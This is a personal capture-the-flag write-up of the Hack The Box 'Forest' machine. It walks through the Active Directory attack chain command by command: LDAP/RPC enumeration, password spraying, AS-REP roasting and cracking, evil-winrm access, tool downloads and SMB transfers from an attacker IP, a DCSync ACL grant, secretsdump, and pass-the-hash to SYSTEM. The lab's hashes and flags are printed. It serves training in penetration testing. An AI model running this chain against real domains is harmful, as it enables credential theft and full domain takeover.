Windows Boxes

forest

  1. nmapAutomator
    1. nmap quickscan
    2. nmap basic scan
    3. nmap UDP scan
    4. nmap full scan
    5. nmap vulns scan
    6. Recon Recommendations
      1. smb recon
      2. ldap recon
  2. ldap
    1. recon suggestion from nmapAuto
    2. ldapsearch w/ DC
      1. grep -i memberof
      2. search objectclass person
        1. grep sAMAccountName
        2. userlist.ldap
        3. extra username in rpcclient
  3. Initial Foothold
    1. smb
    2. password spray user accts w/ custom password list
      1. hashcat best64 rule
      2. add !s / toggle1.rule
      3. make passwords length 7 minimum
      4. crackmapexec
        1. null authentication allows domain enumeration
        2. crackmapexec Brute Force
      5. enum4linux
    3. getNPUsers.py
      1. hashcat BF ticket
      2. evil-winrm
  4. privesc
    1. sharphound
      1. run SharpHound.exe on victim
      2. encode/copy/paste files back to attack machine
      3. OR set up smb share between attack and victim machines
    2. neo4j
      1. bloodhound
      2. shortest path from owned Principals
        1. query: shortest path to domain admin from owned principles
        2. WritedACL Abuse info
      3. report summary
    3. attackpath
      1. Create a user on the domain
      2. Add the user to the Exchange Windows Permission group
      3. Give the user DcSync privileges
        1. Add-DomainObjectAcl error
      4. Perform a DcSync attack and dump the password hashes of all the users on the domain
      5. Perform a Pass the Hash attack to get access to the administrator’s account
  5. user/root
  6. Lessons Learned

forest

images/1137-1.png
images/1137-2.png

nmapAutomator

lets start off using Tib3rius' autorecon tool
nmapautomator.sh 10.10.10.161 All
• nmap quickscan
• nmap basic scan
• nmap UDP scan
• nmap full scan
• nmap vulns scan
• Recon Recommendations

images/1138-1.png
Notes:

1. Since the Kerberos and LDAP services are running, chances are we’re dealing with a Windows Active Directory box.
2. The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS nmap scan leaks the operating system: Windows Server 2016 Standard 14393.
3. Port 389 is running LDAP. We’ll need to query it for any useful information. Same goes for SMB.
4. The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.

nmap quickscan

images/1139-1.png

nmap basic scan

images/1140-1.png
images/1140-2.png

nmap UDP scan

images/1141-1.png


images/1141-2.png

nmap full scan

images/1142-1.png

images/1142-2.png

nmap vulns scan

images/1143-1.png

all failed*

Recon Recommendations

images/1144-1.png

smb recon

images/1146-1.png

ldap recon

images/1147-1.png

ldap

thanks to naming context, we know the domain controller is htb, and local

ldapsearch -h 10.10.10.161 -x -s base namingcontexts
images/1149-1.png
DC=htb, DC=local

recon suggestion from nmapAuto

we can enumerate the ldap service with ldapsearch

ldapsearch -x -h 10.10.10.161 -s base | tee recon/ldapsearch_10.10.10.161.txt
images/1150-1.png

ldapsearch w/ DC

images/1152-1.png

where


images/1152-2.png
images/1152-3.png

grep -i memberof

images/1153-1.png

search objectclass person

ldapsearch -h 10.10.10.161 -x -b "DC=htb, DC=local" '(objectclass=person)'
images/1154-1.png

we got santi rodriguez
images/1154-2.png

sAMAccountName: santi
sAMAccountType: 805306368

images/1154-3.png

we can filter our ldapsearch to only output information that's important to us

lets filter our search down to sAMAccountName and sAMAccountType
images/1154-4.png

grep sAMAccountName

we're gathering all these AccountNames so we can password spray them
images/1155-1.png

userlist.ldap

we're going to use grep and awk to put all these accounts into a file

ldapsearch -h 10.10.10.161 -x -b "DC=htb, DC=local" '(objectclass=Person)' SAMAccountName SamAccountType | grep SAMAccountName | awk '{print $2}'
images/1156-1.png

gives us a very clean list of users
images/1156-2.png
we want to narrow these down to user accounts and not service accounts since those are automaticaly generated and practically impossible to crack

list ends up looking like this
images/1156-3.png

extra username in rpcclient

rpclient domuser command shows us we're missing a user account!

rpcclient -U '' 10.10.10.161
images/1165-1.png

by connecting the rpc client and issuing enumdomusers we see images/1165-2.png is an account we missed!
images/1165-3.png
images/1165-4.png


images/1165-5.png
images/1165-6.png
svc-alfesco

Initial Foothold




smb

lets enumerate the smb share as well with smbmap/smbclient

smbmap -H 10.10.10.161
images/1148-1.png

smbclient -L //10.10.10.161////
images/1148-2.png

nothing here but we can try bruteforcing a login with userlist and pwlist

password spray user accts w/ custom password list

we want to save time and not use rockyou so we're going to make our own
images/1157-1.png
images/1157-2.png


we can add years to the list with a bashscript
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done
images/1157-3.png
images/1157-4.png

store the wordlist in a temp file t and mv it to pwlist.txt
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > t
images/1157-5.png
mv t pwlist.txt
images/1157-6.png

it would be laughable if the password was in this list, but we can make the list much more complex with the help of hashcat




hashcat best64 rule

using the hashcat rule best64 will complexify our pwlist

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule
images/1158-1.png
images/1158-2.png

this mutates our original password list and does a lot of really cool things!

add !s / toggle1.rule

our list doesnt have any exclamation points so lets go back and generate a wordlist that has them

for i in $(cat pwlist); do echo $i; echo ${i}\!; done
images/1159-1.png
cat t
images/1159-2.png

copy our temp wordlist t to pwlist.txt
images/1159-3.png

images/1159-4.png

we can also chain rules like toggles to mix uppercase and lower case letters

images/1159-5.png

after using these rules we have a total of 50000+ passwords we're going to use!
images/1159-6.png



make passwords length 7 minimum

last we're going to ensure our passwords are at least 7 characters long

awk 'length($0) > 7' | wc -l
images/1160-1.png

we see limiting our password list to have passwords to be at least 7 characters or greater has narrowed our list down from 50k to ~40k
images/1160-2.png

output to t
images/1160-3.png

and cp t pwlist.txt
images/1160-4.png

crackmapexec

images/1161-1.png

we can also do whats called a crackmapexec null authentication attempt
where we fille the username and password parameters with empty strings
images/1161-2.png
it doesnt' work but it does allow domain enumeration (see child node)

important: thanks to null authentication enumeration we see that there is no account lockout and we're free to brute force
images/1161-3.png



null authentication allows domain enumeration

images/1163-1.png

domain enumeration
images/1163-2.png
images/1163-3.png

images/1163-4.png

crackmapexec Brute Force

now that we've generated our password list, lets use our ldap userlist along with our custom password list and try to brute force our way into the smb share
crackmapexec smb 10.10.10.161 -u userlist.ldap -p pwlist.txt
images/1164-1.png

will run for a while so keep it open and keep checking back, will fail a lot!

heres a taste of the output
images/1164-2.png

enum4linux

real ugly output so not going to bother pasting besides a few enumeration things we already found out

enum4linux 10.10.10.161
images/1162-1.png

images/1162-2.pngusers

images/1162-3.png

getNPUsers.py

If kerberos pre-authentication is disabled on any of the box's accounts, we can use the GetNPUsers impacket script to send a dummy request for authentication. The Key Distribution Center KDC will then return a Ticket Generating Ticket TGT that is encrypted with the user's password. From there, we can take the encrypted TGT, run it through a password cracker and brute force the password

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request
images/1167-1.png
images/1167-2.png
the Kerberos pre-authentication option has been disabled fr the user svc-alfresco and the KDC gave us back a TGT with the user's password

$krb5asrep$23$svc-alfresco@HTB.LOCAL:4933542ada6053e22fa16eacac49dc5d$6f4f91cc61441ebca25cad737b2941e4349126068e0e575b7b13d0ff5b748acfb529e8d18353750a618ef3a16e506ad9e9beb93e932f2fc088357d0fe8e3180d69c572d7561d62d5dd31fce165b10088f3a79f6b0a7d31f1dd6209e08e42d14f540a909f2803b182d588a9f3171c99282c88d29c17e9774c7f69c0e60a9c12f2cb2f2440468f61684b8f6e992e2b10b7620c9bd8891e6f7978cdb665e29417df2bd6f2003373babc82a92d07a1e9cf5a8566da337aee509bccbc8975e5ec749f201158e24730c811a485b9d810ea92df5cf741591d8a98ed44295cb750cd29f755b85a26f63c

lets save the ticket to hash.txt

hashcat BF ticket

images/1168-1.png
images/1168-2.png so we know the module is either 13100 or 18200

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
images/1168-3.png
images/1168-4.png

svc-alfresco
password = s3rvice

evil-winrm

now that we have the username and password we can use evil-winrm script to gain an initial foothold onto the box. This is only possible because the WinRM and WSMan services are open

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
images/1169-1.png

and we're in! we can grab the userflag

privesc

thanks to win-rm with svc-alfresco's credentials, we've gained an initial foothold on the box

we can issue net user /domain to confirm the AD accounts
images/1174-1.png
images/1174-2.png
and check out what type of user svc-alfresco is

images/1174-3.png

from this info we see svc-alfresco is both a domain user and a service account:
images/1174-4.png


sharphound

from here lets run sharphound to see if there are any exploitable paths to privesc

images/1173-1.png
images/1173-2.png

we're going to want to download and run this file to our victim box on our svc-alfresco account

1) set up http server
images/1173-3.png
images/1173-4.png

2) get the latest version of bloodhound since it is updated regularly
images/1173-5.png
images/1173-6.png

3) Download SharpHound.exe onto our victim machine and run it

(new-object system.net.webclient).downloadfile('http://10.10.14.62:5555/SharpHound.exe', 'C:\Users\svc-alfresco\Documents\SharpHound.exe')

images/1173-7.png

images/1173-8.png

run SharpHound.exe on victim

.\SharpHound.exe -c all
images/1175-1.png

images/1175-2.png

encode/copy/paste files back to attack machine

images/1176-1.png

we want to run images/1176-2.png on our attack machine

We need to transfer the ZIP file to our attack machine. To do that, base64 encode the file.

images/1176-3.png
images/1176-4.png
certutil -encode

Then output the base64 encoded file.

images/1176-5.png
Copy it and base64 decode it on the attack machine.

images/1176-6.png

Drag and drop the zipped file into BloodHound. Then set the start node to be the svc-alfresco user.


OR set up smb share between attack and victim machines

first we want to set up our smb server on our attacking machine, we'll use impacket's -smbserver to initialize it

impacket -smbserver PleaseSubscribe $(pwd) -smb2support -user ippsec -password SupportMeOnPatreon
where
name is PleaseSubscribe
$(PWD) shares the current directory
-smb2support
-user set to ippsec
-password set to SupportMeOnPatreon

images/1179-1.png


from here we need to store these credentials in a variable on our victim machine
1. set our password to the variable $passimages/1179-2.png
$pass= convertto-securestring ‘SupportMeOnPatreon’ -AsPlainText -Force
2. now we create a cred variable and add our username and passimages/1179-3.png
$cred = New-Object System.Management.Automation.PSCredential('ippsec', $pass)
3. now we connect to our smbserver from our victim machine with this commandimages/1179-4.png
New-PSDrive -Name ippsec -PSProvider FileSystem -Credential $cred -Root \\10.10.14.62\PleaseSubscribe

and we're connected! impacket server shoots back this message:
images/1179-5.pngimages/1179-6.png




neo4j

lets set up the bloodhound database on our attacking machine:

neo4j console
images/1177-1.png
images/1177-2.png

bloodhound

now lets run bloodhound from our attacking machine and load in our report file images/1178-1.png extracted from our victim


images/1178-2.png

now drag and drop our zip file into bloodhound
images/1178-3.png


images/1178-4.png

mark the user svc_alfresco as owned
images/1178-5.png

and query shortest path from owned Principals
images/1178-6.png

shortest path from owned Principals

images/1180-1.png

query: shortest path to domain admin from owned principles

images/1171-1.png

This query shows that svc_alfresco is a member of the service accounts with is a member of the account operators which have WriteDacl Permissions which can create an account as administrator!
images/1171-2.png

WritedACL Abuse info

we go over utilizing this abuse in the attackpath node:

images/1189-1.png


images/1189-2.png
(we also add -PrincipalIdentity <user> in this statement, more on this later)

report summary

images/1181-1.png

attackpath

images/1183-1.png

Create a user on the domain

net user <user> <password> /add /domain
images/1182-1.png

net user /domain
images/1182-2.png
we see our account images/1182-3.png was created

Add the user to the Exchange Windows Permission group

net group "Exchange Windows Permissions" /add steve
images/1184-1.png


now to confirm our account was put into that group
net user steve
images/1184-2.png

Give the user DcSync privileges

Give the user DCSync privileges. We’ll use PowerView for this. First download Powerview and setup a python server in the directory it resides in.

images/1185-1.png

(new-object system.net.webclient).downloadfile('http://10.10.14.62:5555/powerview.ps1', 'C:\Users\svc-alfresco\Documents\powerview.ps1')images/1185-2.png

Use the Add-DomainObjectAcl function in PowerView to give the user DCSync privileges.

$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\steve', $pass)
images/1185-3.png

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity steve -Rights DCSync
images/1185-4.png



Add-DomainObjectAcl error

we see that the Add-DomainObjectAcl command is not recognized, lets see if the cmd is in our powerview.ps1 script

images/1188-1.png

grep -i Add-Domain PowerView.ps1
images/1188-2.png

no indication that Add-Domain is in our PowerView.ps1 script, lets download the dev version
images/1188-3.png


images/1188-4.png

Perform a DcSync attack and dump the password hashes of all the users on the domain

We're going to dump the password hashes using Impacket-Secretsdump

impacket-secretsdump htb.local/steve:password@10.10.10.161
images/1186-1.png

images/1186-2.png

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Perform a Pass the Hash attack to get access to the administrator’s account

now to take the administrator's hash and pass it along with psexec.py

Administrator's NTLM hash is: aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
images/1187-1.png
images/1187-2.png

and we get a nt authority\system shell!
images/1187-3.png

user/root

images/1172-1.png
e5e4e47ae7022664cda6eb013fb0d9ed

images/1172-2.png
f048153f202bbb2f82622b04d79129cc

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1455-1.png
images/1455-2.png